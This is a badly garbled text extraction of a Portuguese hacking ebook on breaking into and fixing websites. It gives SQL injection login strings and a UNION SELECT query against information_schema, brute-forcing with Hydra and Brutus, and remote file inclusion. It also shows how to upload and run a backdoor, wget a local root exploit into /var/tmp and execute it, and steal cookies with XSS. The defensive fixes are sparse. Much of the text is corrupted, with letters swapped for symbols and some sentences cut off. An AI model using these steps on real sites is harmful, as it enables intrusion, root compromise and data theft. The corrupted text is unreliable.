invasão e correção em sites.pdf
TRANSCRIPT
-
7/22/2019 Invaso e Correo em Sites.pdf
1/10
-
7/22/2019 Invaso e Correo em Sites.pdf
2/10
Invaso e Correo em SitesAutor: $4mu:kt http://www.inw-seguranca.com Twitter:
@inwsegurancaO Contedo deste e ook ! somente para conhecimento" e corre#o" no nos responsai%i&amos pe%o seu mau uso.
'ste e - ook tem como o(eti)o no s* a in)aso" como tam!m a pre)en#o e corre#o em sites da internet.
1 Passo:
+ara se ,a&er a in)aso ! necessrio descorir ,a%has ou rechas" ue ,aci%item a intruso" para isso usaremos scanners.NMAP: canner de ips" onde ,aremos o ,ingerprintACUNETIX:canner de ,a%has" onde scannearemos o site em usca de ,a%has.
FingerPrint: Aui uscaremos ,a%has no ser)idor" atra)!s de programas desatua%i&ados.
Agora digitamos o comando nmap IP-s0 -O --)ersion-intensit1 2 para iniciar o 3ingerprint" se ne%e aparecer programas antigos"de)emos procurar ep%oits" um eemp%o de pesuisa no goog%e seria: 'p%oit Apache 5.6 . 7orma%mente e%es sero nas %inguagens C"
+8+" +'9" +;T8O7" entre outros. 7o inu asta digitar um comando no termina%" eemp%o: perlep%.p% . Eu no achei nada e a!ora" Ca%ma" no nos demos por )encidos ainda" agora )amos achar )u%nerai%idades no site.Correo: pode tentar emu%a-%o no wine ouprocurar um programa sustituto para inu. Caso ha(a a%guma ,a%ha de)emosep%ora-%a" o ue nos %e)a ao pr*imo passo.
Robots.txt: 'ste arui)o da ordens para os uscadores e as )e&es re)e%a ,icheirosocu%tos o de administra#o. 7orma%mente este teto ,ica na pasta principa% do site e:www.site.com/roots.tt. 'nto procuramos os arui)os ue esto dissa%ow.Ex:User-agent: Googlebot
Disallow: /admin'nto )amos nesse diret*rio" ! a areaadministrati)e do site" n*s podemosep%orar do seguinte modo:
http://www.inw-seguranca.com/http://www.inw-seguranca.com/http://www.site.com/robots.txthttp://www.inw-seguranca.com/http://www.site.com/robots.txt -
7/22/2019 Invaso e Correo em Sites.pdf
3/10
Invaso e Correo em SitesAutor: $4mu:kt http://www.inw-seguranca.com Twitter:
@inwsegurancaO Contedo deste e ook ! somente para conhecimento" e corre#o" no nos responsai%i&amos pe%o seu mau uso.
SQL Injection Basico: 'sse tipo de ataue ep%ora uma ,a%ha no ?. 8 casos em ue o programador se distrai e escre)e o c*digo )u%ner)e%" ue entrando com as sctrings:
C#di!o $ulner%vel: &ista de Strin!s
magem imasters.com.r
%ogin: orB6 ou orDBsenha: orB6 ou orDB
or 6EDB6 or 6D6orDB
or aBDFaG or HaBDFa
Correo:
6- Co%ocar magicIuotesIgcp para OnCom esta op#o ser co%ocado um escape antes dos HFG nos parJmetros:-COOK'-+OT
-L'T5- Msar m1s%Irea%IescapeIstringHG
3a& escape nas strings m1s%Iuer1 usadas
N- 0a%idar os parJmetros en)iados pe%os usurios$usuarioIid D HintG$IL'TFusuarioIidFPQO $usuarioIid ser sempre um integer e poderemos contro%ado os dados en)iados pe%os usurios.
http://www.inw-seguranca.com/http://www.inw-seguranca.com/http://www.inw-seguranca.com/ -
7/22/2019 Invaso e Correo em Sites.pdf
4/10
Invaso e Correo em SitesAutor: $4mu:kt http://www.inw-seguranca.com Twitter:@inwseguranca
O Contedo deste e ook ! somente para conhecimento" e corre#o" no nos responsai%i&amos pe%o seu mau uso.
Brute-Force: A t!cnica Rrute-3orce chuta o %ogin e a senha ue esto em uma %ista at! acertar. 'ssas %istas Hword%istsG podem chegar agiga1tes" ou se(a" mi%hSes e mi%hSes de %ogins e senhas.
ois programas muito nusados so o Rrutus H=indowsG e o T8C 81dra HinuG:Tutoria% Rrutus Correo:
Rom" )amos usa-%o para o ue n*s ueremos" entrar na rea admin.T1pe: Co%oue o tipo de coneo ue ueremos uerar" 8ttp Rasic ! para pginas no aseadas em ,ormu%rios. 8ttp 3orm ! para pginas aseadas em ,ormu%rios.Mse Msername:
-
7/22/2019 Invaso e Correo em Sites.pdf
5/10
Invaso e Correo em SitesAutor: $4mu:kt http://www.inw-seguranca.com Twitter:@inwseguranca
O Contedo deste e ook ! somente para conhecimento" e corre#o" no nos responsai%i&amos pe%o seu mau uso.
PHP Injection: +8+ n(ection ou 9emote 3i%e nc%usion ep%ora o uso incorreto da ,un#o inc%ude no +8+.
C#di!o $ulner%vel: 'm um site )u%ner)e% podemos inc%uir um ep%oit" podendo ,a&er um de,ace" ou at!ownar.
-
7/22/2019 Invaso e Correo em Sites.pdf
6/10
Invaso e Correo em SitesAutor: $4mu:kt http://www.inw-seguranca.com Twitter:@inwseguranca
O Contedo deste e ook ! somente para conhecimento" e corre#o" no nos responsai%i&amos pe%o seu mau uso.
Backdoor:
Rackdoor Htam!m conhecido por +orta dos ,undosG ! uma ,a%ha de seguran#a ue pode eistir em umprograma de computador ou
sistema operaciona%"ue pode permitir a in)aso do sistema por umcrackerpara ue e%e possa oter um tota% contro%e da muina. precisa ter acesso para ,a&er o up%oad de um ackdoor.3a#a o up%oad do )ac1door.E(ecute o comando:chmod ackdoorH7o caso ackdoor ! o arui)o upado" se )oc> upou com nome de F %o% F )oc> precisa dar o comando F chmod %o% GA!ora e(ecute o comando:./ackdoor H7ome do Rackdoor" igua% citado a cimaGr aparecer a porta da cmd Hhe%%G e )ai mostrar a )erso do kerne% e se tem %p pra )erso.Agora pegue o ip do Servidor.
A)ra o CM' e di!ite: ping -t www.ositeaserrootado.com.rAra o Putt2e co%oue o + e a porta mostrada na she%%.Agora )oc> est conectado a she%% upada no er)idor.
Agora ! s* rodar o %p da )erso " eecute pe%a she%% mesmo.epois de ter achado o %p para )erso" ,a#a o up%oad de%e pe%a she%% e:E(ecute:cd/)ar/tmp Htmp ! um diret*rio" poderia ser ua%uer outroGwget p%.p% H+oderia ser ua%uer outro nome" esse arui)o ! o %p" ,a#a o up%oad de%eGdepois chmod %p.p%./p%r``ted.
Agora )oc> tem acesse tota%.
0oc> pode encontrar o %p para )erso em www.mi%w`rm.com
Autor: 3E(pl4it5
Correo: Mse sempre um om Anti)_rus e um 3irewa%%" pois e%a ser incapacitada pe%o 3irewa%% e remo)ida pe%o Anti)_rus.
I C Sit
http://www.inw-seguranca.com/http://www.inw-seguranca.com/http://pt.wikipedia.org/wiki/Programa_de_computadorhttp://pt.wikipedia.org/wiki/Sistema_operacionalhttp://pt.wikipedia.org/wiki/Crackerhttp://pt.wikipedia.org/wiki/V%C3%ADrushttp://pt.wikipedia.org/wiki/Malwarehttp://www.milw0rm.com/http://www.inw-seguranca.com/http://pt.wikipedia.org/wiki/Programa_de_computadorhttp://pt.wikipedia.org/wiki/Sistema_operacionalhttp://pt.wikipedia.org/wiki/Crackerhttp://pt.wikipedia.org/wiki/V%C3%ADrushttp://pt.wikipedia.org/wiki/Malwarehttp://www.milw0rm.com/ -
7/22/2019 Invaso e Correo em Sites.pdf
7/10
Invaso e Correo em SitesAutor: $4mu:kt http://www.inw-seguranca.com Twitter:@inwseguranca
O Contedo deste e ook ! somente para conhecimento" e corre#o" no nos responsai%i&amos pe%o seu mau uso.
Loca Fie !iscosure:
C#di!o $ulner%vel: oca% 3i%e isc%osure ou 3 permite )er os arui)os do sistema" em como seus
WUphp// +ostado por A%%
-
7/22/2019 Invaso e Correo em Sites.pdf
8/10
Invaso e Correo em SitesAutor: $4mu:kt http://www.inw-seguranca.com Twitter:@inwseguranca
O Contedo deste e ook ! somente para conhecimento" e corre#o" no nos responsai%i&amos pe%o seu mau uso.
"ross Site Scri#ting:
C ou roua cookies e permiti usa-%os como se ,osse o usurio origina% daue%e cookie.
7este artigo do site:http://www.inw-seguranca.com/wordpress/UpD^64" hdois )ideos de como ep%orar esta )u%nerai%idade" mas aui )ai um tutoria%:
Xss para redirecionar:A%guns sites possuem murais" ou comentarios ue permitem 8T
-
7/22/2019 Invaso e Correo em Sites.pdf
9/10
Invaso e Correo em SitesAutor: $4mu:kt http://www.inw-seguranca.com Twitter:@inwseguranca
O Contedo deste e ook ! somente para conhecimento" e corre#o" no nos responsai%i&amos pe%o seu mau uso.
S$ Injection %&an'ado:
73O9s a descorirem as tae%as e as co%unas de um anco de dados uti%i&ando o in,ormationIschema[ Com estem!todo )oc> no ! origado a ir chutando nomes de tae%as e co%unas at! encontrar e%a" ou uti%i&ar a%gum programa espec_,ico. 0oc>
,a& manua%mente. A_ est a )erdadeira arte do ? n(ection['sta mat!ria eu ,i& agora" no e%aorei muito" ento se hou)er a%gum erro a)isem hehehe'spero ue todos tenham gostado e ue e%a se(a astante ti%[Tam!m comp%ementando outro m!todo ue no co%ouei na mat!ria:www.site.com.r/noticias.phpUidD-62Mnione%ect6"LroupIConcatHTa%eI7ameG"N"4"2"b,romin,ormationIschema.ta%eswhereta%eIschemaDdataaseHG
Assim iro ser %istadas as tae%asAutor: rahac1/in
Invaso e Correo em Sites
http://www.inw-seguranca.com/http://www.inw-seguranca.com/http://www.site.com.br/noticias.php?id=-15+Union+Select+1,2,3,4,5,6+From+Information_Schema.Tableshttp://www.inw-seguranca.com/http://www.site.com.br/noticias.php?id=-15+Union+Select+1,2,3,4,5,6+From+Information_Schema.Tables -
7/22/2019 Invaso e Correo em Sites.pdf
10/10
Invaso e Correo em SitesAutor: $4mu:kt http://www.inw-seguranca.com Twitter:@inwseguranca
O Contedo deste e ook ! somente para conhecimento" e corre#o" no nos responsai%i&amos pe%o seu mau uso.
"oncus(o: Aui aprendemos a%gumas ,a%has e ataues" mas tamem como nos proteger" mas ,iue atento" no)as )u%nerai%idades e ,a%hasaparecem a cada minuto" por isso este(a em constante procura.
Origado a todos ue %eram esse e-ook" espero ter sido uti%" e at! a pr*ima QG
Para sa)er mais entre em: http:;;;5in;8se!uranca5com
http://www.inw-seguranca.com/http://www.inw-seguranca.com/http://www.inw-seguranca.com/http://www.inw-seguranca.com/http://www.inw-seguranca.com/http://www.inw-seguranca.com/